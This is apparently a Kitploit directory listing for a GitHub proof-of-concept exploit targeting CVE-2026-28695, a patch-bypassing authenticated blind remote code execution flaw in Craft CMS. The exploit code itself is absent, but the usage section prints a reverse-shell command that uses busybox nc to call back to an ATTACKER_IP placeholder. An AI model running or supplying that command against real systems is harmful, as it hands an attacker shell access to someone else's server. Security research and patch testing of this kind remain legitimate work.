Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-28695 — Python PoC exploit for CVE-2026-28695, an authenticated blind RCE in Craft CMS that bypasses the create() BaseObject patch and spawns a reverse shell. | Kitploit
Tools/GitHubGitHub/predyy/cve-2026-28695
Vulnerability AnalysisExploitationWeb Application ExploitationPost-ExploitationWeb SecurityPenetration TestingRed TeamingRemote Access Tool
GitHubpredyy/cve-2026-28695

CVE-2026-28695

Python PoC exploit for CVE-2026-28695, an authenticated blind RCE in Craft CMS that bypasses the create() BaseObject patch and spawns a reverse shell.

134 days agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-28695 Patch Bypass - Craft CMS Blind RCE

Authenticated blind remote code execution in Craft CMS. Bypasses the create() - BaseObject restriction added in the CVE-2026-28695 fix (commit e31e508).

Usage

python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'

Disclaimer

This script is intended for educational purposes only. The author is not responsible for any misuse or damage caused by this exploit. Always ensure you have permission before testing or exploiting vulnerabilities!

Download Tool